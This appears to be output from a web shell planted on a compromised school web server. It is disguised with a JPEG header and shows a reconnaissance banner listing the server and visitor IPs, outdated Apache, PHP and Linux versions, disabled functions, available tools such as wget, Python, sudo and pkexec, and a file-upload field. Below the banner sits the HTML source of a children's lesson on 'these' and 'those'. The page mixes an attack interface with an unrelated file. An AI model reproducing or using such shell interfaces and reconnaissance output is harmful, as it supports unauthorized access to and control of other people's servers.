????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.138.191.28 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old2/Html/LevelC/Category1/ |
Upload File : |
<!doctype html> <html> <head> <title>These, Those Words usage</title> <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script> <style type="text/css"> .style_text { color: black; font-size: 24px; font-weight:bold; font-family: 'Arial Rounded MT Bold', cursive; } .Style_heading { font-size: 24px; font-family: "Arial Rounded MT Bold"; font-style: italic; color: black; border-collapse:collapse; } </style> <script> function page_preLoad() { setPageImages(); shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.C, Category.No1, 11), true, true); shared_setFooterTable('id_tblFooter', true, true, false, true, true); shared_hideAllExceptFirstElement('id_SpanWordThese', 3); shared_hideAllExceptFirstElement('id_SpanWordThose', 3); } function page_onLoad() { shared_set_debugInfo(Level.C, Category.No1); shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta'); } function setPageImages() { var imagePath = '../../../img/LevelC/Category1/LevelCCat1Lesson11/'; shared_setImageSource('id_imgBread', imagePath, 'bread.png'); shared_setImageSource('id_imgCrows', imagePath, 'crows.png'); shared_setImageSource('id_imgDrums', imagePath, 'drums.png'); shared_setImageSource('id_imgFrogs', imagePath, 'frogs.png'); shared_setImageSource('id_imgGrapes', imagePath, 'grapes.png'); shared_setImageSource('id_imgTrees', imagePath, 'trees.png'); } function btnPrevious_click() { window.location = "LevelCCat1Lesson10.html"; } function btnNext_click() { window.location = "LevelCCat1Lesson12.html"; } function btnHome_click() { shared_btnHomeCategories_click('LevelC'); } function DragDrop(id_tdBoxForThese, isTheseWords) { shared_setTextAndBackgroundColorToGreen(shared_currentDropingId, id_tdBoxForThese, '', ''); if (isTheseWords) { shared_unHideNextElement('id_SpanWordThese', 3); } else { shared_unHideNextElement('id_SpanWordThose', 3); } isAllInfosMovedShowClapsAnimation(); } function isAllInfosMovedShowClapsAnimation() { var allElementIdsArray = ['id_SpanWordThese1', 'id_SpanWordThese2', 'id_SpanWordThese3', 'id_SpanWordThose1', 'id_SpanWordThose2', 'id_SpanWordThose3']; shared_is_all_infos_moved_show_claps_animation(allElementIdsArray, 'shared_id_div_claps_image'); } </script> </head> <body onload="page_onLoad()"> <div id="shared_id_div_claps_image"> </div> <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0"> <tr height="5%"> <td> <header height="100%"> <div id="id_tblHeader" align="center"></div> </header> </td> </tr> <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device --> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="2%"> <td> <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="5" style="border:none"> <tr> <td class="Style_heading" style="border-bottom: none"><u>Use <span style="color: red"><u>these</u></span> when things are close to us</u></td> </tr> <tr> <td class="Style_heading" style="border-top: none ;border-bottom: none"><u>Use <u><span style="color: red"><u>those</u></span> when the things are away from us</u></td> </tr> </table> </td> </tr> <tr height="*"> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="100%"> <td> <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border:none"> <tr height="7%"> <td style="border-bottom:none"> <table id="id_tblOptionsSet3" border="0" width="100%" height="100%" cellspacing="0" cellpadding="0"> <tr> <td width="*" class="shared_style_text1">Options:</td> <td width="15%" class="shared_style_text1" style="color: red"><span id="id_SpanWordThese1" class="cls_SpanWordThese1" draggable="true" ondragstart="shared_dragStart(event)">these</span></td> <td width="15%" class="shared_style_text1" style="color: red"><span id="id_SpanWordThese2" class="cls_SpanWordThese2" draggable="true" ondragstart="shared_dragStart(event)">these</span></td> <td width="15%" class="shared_style_text1" style="color: red"><span id="id_SpanWordThese3" class="cls_SpanWordThese3" draggable="true" ondragstart="shared_dragStart(event)">these</span></td> <td width="15%" class="shared_style_text1" style="color: red"><span id="id_SpanWordThose1" class="cls_SpanWordThose1" draggable="true" ondragstart="shared_dragStart(event)">those</span></td> <td width="15%" class="shared_style_text1" style="color: red"><span id="id_SpanWordThose2" class="cls_SpanWordThose2" draggable="true" ondragstart="shared_dragStart(event)">those</span></td> <td width="15%" class="shared_style_text1" style="color: red"><span id="id_SpanWordThose3" class="cls_SpanWordThose3" draggable="true" ondragstart="shared_dragStart(event)">those</span></td> </tr> </table> </td> </tr> <tr height="*"> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width = "100%"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="padding-top: 20px; padding-bottom: 20px"> <tr> <td width = "20%"></td> <td width="15%" id="id_tdBoxForThese1" class="style_text" align="center" style="vertical-align: middle">_____</td> <td width = "20%" class="style_text">are <span style="color: red">breads.</span></td> <td width="*"> <img id="id_imgBread" width="20%" height="60%"> </td> </tr> </table> </td> </tr> <tr> <td width = "100%"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="padding-top: 20px; padding-bottom: 20px"> <tr> <td width = "20%"></td> <td width="15%" id="id_tdBoxForThose1" class="style_text" align="center" style="vertical-align: middle">_____</td> <td width = "20%" class="style_text">are <span style="color: red">crows.</span></td> <td width = "*"> </td> <td width="10%"> <img id="id_imgCrows" width="60%" height="60%"> </td> </tr> </table> </td> </tr> <tr> <td width = "100%"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="padding-top: 20px; padding-bottom: 20px"> <tr> <td width = "20%"></td> <td width="15%" id="id_tdBoxForThese2" class="style_text" align="center" style="vertical-align: middle">_____</td> <td width = "20%" class="style_text">are <span style="color: red">drums.</span></td> <td width="*"> <img id="id_imgDrums" width="20%" height="60%"> </td> </tr> </table> </td> </tr> <tr> <td width = "100%"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="padding-top: 20px; padding-bottom: 20px"> <tr> <td width = "20%"></td> <td width="15%" id="id_tdBoxForThose2" class="style_text" align="center" style="vertical-align: middle">_____</td> <td width = "20%" class="style_text">are <span style="color: red">grapes.</span></td> <td width = "*"> </td> <td width="10%"> <img id="id_imgGrapes" width="60%" height="60%"> </td> </tr> </table> </td> </tr> <tr> <td width = "100%"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="padding-top: 20px; padding-bottom: 20px"> <tr> <td width = "20%"></td> <td width="15%" id="id_tdBoxForThese3" class="style_text" align="center" style="vertical-align: middle">_____</td> <td width = "20%" class="style_text">are <span style="color: red">frogs.</span></td> <td width="*"> <img id="id_imgFrogs" width="20%" height="60%"> </td> </tr> </table> </td> </tr> <tr> <td width = "100%"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="padding-top: 20px; padding-bottom: 20px"> <tr> <td width = "20%"></td> <td width="15%" id="id_tdBoxForThose3" class="style_text" align="center" style="vertical-align: middle">_____</td> <td width = "20%" class="style_text">are <span style="color: red">trees.</span></td> <td width = "*"> </td> <td width="10%"> <img id="id_imgTrees" width="60%" height="60%"> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="5%"> <td> <footer height="100%"> <div id="id_tblFooter" align="center"></div> </footer> </td> </tr> </table> <script> page_preLoad(); new webkit_draggable('id_SpanWordThese1', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanWordThese1'}}); new webkit_draggable('id_SpanWordThese2', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanWordThese2'}}); new webkit_draggable('id_SpanWordThese3', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanWordThese3'}}); new webkit_draggable('id_SpanWordThose1', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanWordThose1'}}); new webkit_draggable('id_SpanWordThose2', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanWordThose2'}}); new webkit_draggable('id_SpanWordThose3', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_SpanWordThose3'}}); webkit_drop.add('id_tdBoxForThese1', {accept:["cls_SpanWordThese1", "cls_SpanWordThese2", "cls_SpanWordThese3"], onDrop : function(){DragDrop('id_tdBoxForThese1', true)}}); webkit_drop.add('id_tdBoxForThese2', {accept:["cls_SpanWordThese1", "cls_SpanWordThese2", "cls_SpanWordThese3"], onDrop : function(){DragDrop('id_tdBoxForThese2', true)}}); webkit_drop.add('id_tdBoxForThese3', {accept:["cls_SpanWordThese1", "cls_SpanWordThese2", "cls_SpanWordThese3"], onDrop : function(){DragDrop('id_tdBoxForThese3', true)}}); webkit_drop.add('id_tdBoxForThose1', {accept:["cls_SpanWordThose1", "cls_SpanWordThose2", "cls_SpanWordThose3"], onDrop : function(){DragDrop('id_tdBoxForThose1', false)}}); webkit_drop.add('id_tdBoxForThose2', {accept:["cls_SpanWordThose1", "cls_SpanWordThose2", "cls_SpanWordThose3"], onDrop : function(){DragDrop('id_tdBoxForThose2', false)}}); webkit_drop.add('id_tdBoxForThose3', {accept:["cls_SpanWordThose1", "cls_SpanWordThose2", "cls_SpanWordThose3"], onDrop : function(){DragDrop('id_tdBoxForThose3', false)}}); </script> </body> </html>